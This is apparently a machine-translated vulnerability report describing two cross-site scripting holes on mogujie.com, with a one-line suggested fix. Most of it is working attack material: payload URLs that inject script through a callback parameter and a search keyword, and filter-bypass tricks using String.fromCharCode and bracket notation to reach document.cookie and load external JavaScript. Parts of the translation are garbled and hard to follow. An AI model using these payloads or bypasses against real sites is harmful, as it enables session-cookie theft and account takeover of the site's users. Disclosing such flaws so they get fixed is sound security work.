First, focus on: first, a dom-type xss. url parameters are output in js. Original url in http://www.mogujie.com/upload/addpic? Callback = parent; prompt (/test/); // & code = 3002 it is easy to pop up the window at the beginning, but Jianxin tells us that there is a lack of proof cases that can affect others' accounts or data, therefore, further use is required. The document. cookie won't pop up. It turns out that it was erased by the card, and the case cannot be changed. Including document. write document. body. append. But Sister-in-law paper is still cross-cutting. How can this problem be solved? Object. func is equivalent to object ["func"], so document. cookie = document [String. fromCharCode (99,111,111,107,105,101)] is generated successfully. When constructing payload, use document [String. fromCharCode (119,114,105,116,101)] instead of document. write. This webpage has a body, so calling document. body. append will be null object... or using document. append. Call external js effect is as follows -------------- another is normal reflection xss, directly play cookie, wood filter http://www.mogujie.com/magic/brand/1qi? Keyword = 1% 3C % 2 ftitle % 3E % 3 Cscript % 3 Eprompt % 28document. cookie % 29% 3C/script % 3E
Solution:
Encode the output?